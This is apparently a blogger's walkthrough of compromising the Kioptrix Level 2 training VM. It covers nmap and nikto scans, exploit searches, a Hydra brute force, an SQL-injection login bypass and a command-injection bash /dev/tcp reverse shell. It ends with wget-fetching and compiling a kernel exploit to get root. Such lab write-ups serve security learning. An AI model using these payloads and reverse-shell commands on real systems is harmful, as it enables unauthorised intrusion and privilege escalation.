Contents

Booted VM

Information Gathering

nmap

$ sudo nmap -nP 10.10.10.5
Nmap scan report for 10.10.10.5
Host is up (0.00023s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
443/tcp  open  https
631/tcp  open  ipp
3306/tcp open  mysql
MAC Address: 08:00:27:3E:B5:03 (Oracle VirtualBox virtual NIC)

nikto

$ sudo nikto --host 10.10.10.5
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.5
+ Target Hostname:    10.10.10.5
+ Target Port:        80
+ Start Time:         2020-07-16 21:48:35 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.0.52 (CentOS)
+ Retrieved x-powered-by header: PHP/4.3.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.0.52 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE 
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ Uncommon header 'tcn' found, with contents: choice
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 357810, size: 4872, mtime: Sat Mar 29 13:41:04 1980
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8673 requests: 1 error(s) and 17 item(s) reported on remote host
+ End Time:           2020-07-16 21:49:20 (GMT-4) (45 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Yummmy yummy, mysql and PHP! I think it’s pretty likely that I can get in with SQL injection and hopefully sql is misconfigured and running as root!

Let’s start with Apache though:

$ searchsploit apache 2.0.52
------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                                  |  Path
------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution                                                                                 | php/remote/29290.c
Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner                                                                               | php/remote/29316.py
Apache 2.0.52 - GET Denial of Service                                                                                                           | multiple/dos/855.pl
Apache < 2.0.64 / < 2.2.21 mod_setenvif - Integer Overflow                                                                                      | linux/dos/41769.txt
Apache < 2.2.34 / < 2.4.27 - OPTIONS Memory Leak                                                                                                | linux/webapps/42745.py
Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation                                                                                | linux/webapps/44498.py
Apache CouchDB < 2.1.0 - Remote Code Execution                                                                                                  | linux/webapps/44913.py
Apache CXF < 2.5.10/2.6.7/2.7.4 - Denial of Service                                                                                             | multiple/dos/26710.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow                                                                            | unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1)                                                                      | unix/remote/764.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)                                                                      | unix/remote/47080.c
Apache OpenMeetings 1.9.x < 3.1.0 - '.ZIP' File Directory Traversal                                                                             | linux/webapps/39642.txt
Apache Struts 2 < 2.3.1 - Multiple Vulnerabilities                                                                                              | multiple/webapps/18329.txt
Apache Struts 2.0.0 < 2.2.1.1 - XWork 's:submit' HTML Tag Cross-Site Scripting                                                                  | multiple/remote/35735.txt
Apache Struts 2.0.1 < 2.3.33 / 2.5 < 2.5.10 - Arbitrary Code Execution                                                                          | multiple/remote/44556.py
Apache Struts < 1.3.10 / < 2.3.16.2 - ClassLoader Manipulation Remote Code Execution (Metasploit)                                               | multiple/remote/41690.rb
Apache Struts < 2.2.0 - Remote Command Execution (Metasploit)                                                                                   | multiple/remote/17691.rb
Apache Struts2 2.0.0 < 2.3.15 - Prefixed Parameters OGNL Injection                                                                              | multiple/webapps/44583.txt
Apache Tomcat < 5.5.17 - Remote Directory Listing                                                                                               | multiple/remote/2061.txt
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal                                                                                             | unix/remote/14489.c
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC)                                                                                       | multiple/remote/6229.txt
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (1)                                    | windows/webapps/42953.txt
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2)                                    | jsp/webapps/42966.py
Apache Xerces-C XML Parser < 3.1.2 - Denial of Service (PoC)                                                                                    | linux/dos/36906.txt
Webfroot Shoutbox < 2.32 (Apache) - Local File Inclusion / Remote Code Execution                                                                | linux/remote/34.pl
------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner Look’s like something worth trying to me!

$ cp /usr/share/exploitdb/exploits/php/remote/29316.py .
$ less 29316.py
# It tells us to start a tcp listener for the reverse shell
$ nc –lvp 4444 &
$ sudo python 29316.py
$ sudo python 29316.py 
--==[ ap-unlock-v1337.py by [email protected] ]==--
usage: 

  ./ap-unlock-v1337.py -h <4rg> -s | -c <4rg> | -x <4rg> [0pt1ons]
  ./ap-unlock-v1337.py -r <4rg> | -R <4rg> | -i <4rg> [0pt1ons]

0pt1ons:

  -h wh1t3h4tz.0rg     | t3st s1ngle h0st f0r vu1n
  -p 80                | t4rg3t p0rt (d3fau1t: 80)
  -S                   | c0nn3ct thr0ugh ss1
  -c 'uname -a;id'     | s3nd c0mm4nds t0 h0st
  -x 192.168.0.2:1337  | c0nn3ct b4ck h0st 4nd p0rt f0r sh3ll
  -s                   | t3st s1ngl3 h0st f0r vu1n
  -r 133.1.3-7.7-37    | sc4nz iP addr3ss r4ng3 f0r vu1n
  -R 1337              | sc4nz num r4nd0m h0st5 f0r vu1n
  -t 2                 | c0nn3ct t1me0ut in s3x (d3fau1t: 3)
  -T 2                 | r3ad t1me0ut in s3x (d3fau1t: 3)
  -f vu1n.lst          | wr1t3 vu1n h0sts t0 f1l3
  -i sc4nz.lst         | sc4nz h0sts fr0m f1le f0r vu1n
  -v                   | pr1nt m0ah 1nf0z wh1l3 sh1tt1ng
# Wow, this exploit writer is 1337
$ $ sudo python 29316.py -h 10.10.10.5 -p 80 -s -v
--==[ ap-unlock-v1337.py by [email protected] ]==--
[+] sc4nn1ng s1ngl3 h0st 10.10.10.5 
-> 10.10.10.5 n0t vu1n
[+] h0p3 1t h3lp3d

Worth a shot, don’t need to be worried about being noisy.

I figured this path seemed fun though, so I loaded up burp and a browser and started poking around:
Burp & Browser

Oh sweet, a shitty admin panel! I played around with the request for a while looking for quick SQL Injection, but no dice. Let’s try metasploit real quick:

msf5 > use auxiliary/scanner/http/blind_sql_query
msf5 auxiliary(scanner/http/blind_sql_query) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------


msf5 auxiliary(scanner/http/blind_sql_query) > show options

Module options (auxiliary/scanner/http/blind_sql_query):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   COOKIE                    no        HTTP Cookies
   DATA                      no        HTTP Body Data
   METHOD   GET              yes       HTTP Method (Accepted: GET, POST)
   PATH     /index.asp       yes       The path/file to test SQL injection
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   QUERY                     no        HTTP URI Query
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   THREADS  1                yes       The number of concurrent threads (max one per host)
   VHOST                     no        HTTP server virtual host

msf5 auxiliary(scanner/http/blind_sql_query) > set METHOD POST
METHOD => POST
msf5 auxiliary(scanner/http/blind_sql_query) > set RHOSTS 10.10.10.5
RHOSTS => 10.10.10.5
msf5 auxiliary(scanner/http/blind_sql_query) > set PATH index.php
PATH => index.php
msf5 auxiliary(scanner/http/blind_sql_query) > run

[*] [Normal response body: 667  code: 200]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/http/blind_sql_query) > set DATA uname=%3B&psw=%3B&btnLogin=Login
DATA => uname=%3B&psw=%3B&btnLogin=Login
msf5 auxiliary(scanner/http/blind_sql_query) > run

[*] [Normal response body: 667  code: 200]
[*] - Testing 'numeric' Parameter uname:
[*] - Testing 'numeric' Parameter psw:
[*] - Testing 'numeric' Parameter btnLogin:
[*] - Testing 'False char numeric' Parameter uname:
[*] - Testing 'False char numeric' Parameter psw:
[*] - Testing 'False char numeric' Parameter btnLogin:
[*] - Testing 'False num numeric' Parameter uname:
[*] - Testing 'False num numeric' Parameter psw:
[*] - Testing 'False num numeric' Parameter btnLogin:
[*] - Testing 'single quotes' Parameter uname:
[*] - Testing 'single quotes' Parameter psw:
[*] - Testing 'single quotes' Parameter btnLogin:
[*] - Testing 'False char single quotes' Parameter uname:
[*] - Testing 'False char single quotes' Parameter psw:
[*] - Testing 'False char single quotes' Parameter btnLogin:
[*] - Testing 'False num single quotes' Parameter uname:
[*] - Testing 'False num single quotes' Parameter psw:
[*] - Testing 'False num single quotes' Parameter btnLogin:
[*] - Testing 'double quotes' Parameter uname:
[*] - Testing 'double quotes' Parameter psw:
[*] - Testing 'double quotes' Parameter btnLogin:
[*] - Testing 'False char double quotes' Parameter uname:
[*] - Testing 'False char double quotes' Parameter psw:
[*] - Testing 'False char double quotes' Parameter btnLogin:
[*] - Testing 'False num double quotes' Parameter uname:
[*] - Testing 'False num double quotes' Parameter psw:
[*] - Testing 'False num double quotes' Parameter btnLogin:
[*] - Testing 'OR single quotes uncommented' Parameter uname:
[*] - Testing 'OR single quotes uncommented' Parameter psw:
[*] - Testing 'OR single quotes uncommented' Parameter btnLogin:
[*] - Testing 'False char OR single quotes uncommented' Parameter uname:
[*] - Testing 'False char OR single quotes uncommented' Parameter psw:
[*] - Testing 'False char OR single quotes uncommented' Parameter btnLogin:
[*] - Testing 'False num OR single quotes uncommented' Parameter uname:
[*] - Testing 'False num OR single quotes uncommented' Parameter psw:
[*] - Testing 'False num OR single quotes uncommented' Parameter btnLogin:
[*] - Testing 'OR single quotes closed and commented' Parameter uname:
[*] - Testing 'OR single quotes closed and commented' Parameter psw:
[*] - Testing 'OR single quotes closed and commented' Parameter btnLogin:
[*] - Testing 'False char OR single quotes closed and commented' Parameter uname:
[*] - Testing 'False char OR single quotes closed and commented' Parameter psw:
[*] - Testing 'False char OR single quotes closed and commented' Parameter btnLogin:
[*] - Testing 'False num OR single quotes closed and commented' Parameter uname:
[*] - Testing 'False num OR single quotes closed and commented' Parameter psw:
[*] - Testing 'False num OR single quotes closed and commented' Parameter btnLogin:
[*] - Testing 'hex encoded OR single quotes uncommented' Parameter uname:
[*] - Testing 'hex encoded OR single quotes uncommented' Parameter psw:
[*] - Testing 'hex encoded OR single quotes uncommented' Parameter btnLogin:
[*] - Testing 'False char hex encoded OR single quotes uncommented' Parameter uname:
[*] - Testing 'False char hex encoded OR single quotes uncommented' Parameter psw:
[*] - Testing 'False char hex encoded OR single quotes uncommented' Parameter btnLogin:
[*] - Testing 'False num hex encoded OR single quotes uncommented' Parameter uname:
[*] - Testing 'False num hex encoded OR single quotes uncommented' Parameter psw:
[*] - Testing 'False num hex encoded OR single quotes uncommented' Parameter btnLogin:
[*] - Testing 'hex encoded OR single quotes closed and commented' Parameter uname:
[*] - Testing 'hex encoded OR single quotes closed and commented' Parameter psw:
[*] - Testing 'hex encoded OR single quotes closed and commented' Parameter btnLogin:
[*] - Testing 'False char hex encoded OR single quotes closed and commented' Parameter uname:
[*] - Testing 'False char hex encoded OR single quotes closed and commented' Parameter psw:
[*] - Testing 'False char hex encoded OR single quotes closed and commented' Parameter btnLogin:
[*] - Testing 'False num hex encoded OR single quotes closed and commented' Parameter uname:
[*] - Testing 'False num hex encoded OR single quotes closed and commented' Parameter psw:
[*] - Testing 'False num hex encoded OR single quotes closed and commented' Parameter btnLogin:
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/http/blind_sql_query) >

Nothing… I ran scans against the other services and there doesn’t seem to be any clear holes…
I’ll try a bruteforce against the admin panel:

$ $ hydra -L /usr/share/metasploit-framework/data/wordlists/unix_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 10.10.10.5 http-post-form "/index.php:uname=^USER^&psw=^PASS^&btnLogin=Login:Login"
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-07-16 22:23:36
[DATA] max 16 tasks per 1 server, overall 16 tasks, 169512 login tries (l:168/p:1009), ~10595 tries per task
[DATA] attacking http-post-form://10.10.10.5:80/index.php:uname=^USER^&psw=^PASS^&btnLogin=Login:Login
[STATUS] 4456.00 tries/min, 4456 tries in 00:01h, 165056 to do in 00:38h, 16 active
[STATUS] 4488.67 tries/min, 13466 tries in 00:03h, 156046 to do in 00:35h, 16 active
[STATUS] 4481.00 tries/min, 31367 tries in 00:07h, 138145 to do in 00:31h, 16 active
[STATUS] 4496.40 tries/min, 67446 tries in 00:15h, 102066 to do in 00:23h, 16 active

While I wait, how about I try to think harder about the problem…
I assume the SQL for this login is something like this:

SELECT * FROM users where Username='$username' and Password='$password';

So, If I can make the query…

SELECT * FROM users where Username='1' or 1=1 and Password='1' or 1=1;

Then we should get in, right?

So, for both fields we can enter 1' or 1=1. It’s a stretch, but I really feel like this is the way in so I’m finding it hard to leave this alone.

Didn’t work… hmm. Wait, I forgot about the end quote in the query, my solution above is wrong! I need something like 1' or '1'=1' to terminate the quote. Let’s try that.

SQL Injection Test
We in

Fuck yes! Nothing like the rush of defeating something!
Now what can we do from here?
rce?
Is this straight up remote code execution? Let’s try localhost && id
rce?
Hell yes it is! Although the user is apache, that’s annoying. Well, let’s start a reverse shell…

# Start a listener on my host
$ nc -lvp 4444
listening on [any] 4444 ...

Now, we should be able to get an interactive bash session with bash -i >& /dev/tcp/10.10.10.3/4444 0>&1
So, let’s try localhost; bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

$ nc -lvp 4444
listening on [any] 4444 ...
10.10.10.5: inverse host lookup failed: Host name lookup failure
connect to [10.10.10.3] from (UNKNOWN) [10.10.10.5] 32775
bash: no job control in this shell
bash-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache)

Lovely! Now what we just need to escalate to root…

I poked around for about 5 minutes looking for the usual easy ways to escalate privs. Nothing jumps out at me.
So, more recon!

$ uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
# my host
$ searchsploit Linux 2.6.x Privilege CentOS
------------------------------------ ---------------------------------
 Exploit Title                      |  Path
------------------------------------ ---------------------------------
Linux Kernel 2.4.x/2.6.x (CentOS 4. | linux/local/9545.c
Linux Kernel 2.6 < 2.6.19 (White Bo | linux_x86/local/9542.c
Linux Kernel 2.6.x / 3.10.x / 4.14. | linux/local/45516.c
------------------------------------ ---------------------------------
Shellcodes: No Results

Alright, so these all look like valid things to try! Let’s try the first one:

# My host
$ cp /usr/share/exploitdb/exploits/linux/local/9545.c .
$ less 9545.c 
# Reverse shell
bash-3.00$ cd tmp && wget 10.10.10.3:8000/9545.c
bash-3.00$ gcc -o x 9545.c       
9545.c:376:28: warning: no newline at end of file
bash-3.00$ echo " \n " >> /tmp/9545.c
bash-3.00$ gcc -o /tmp/x /tmp/9545.c
bash-3.00$ exec /tmp/x
sh: no job control in this shell
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)

Nice, we win!!

Directory
$ cd content && tree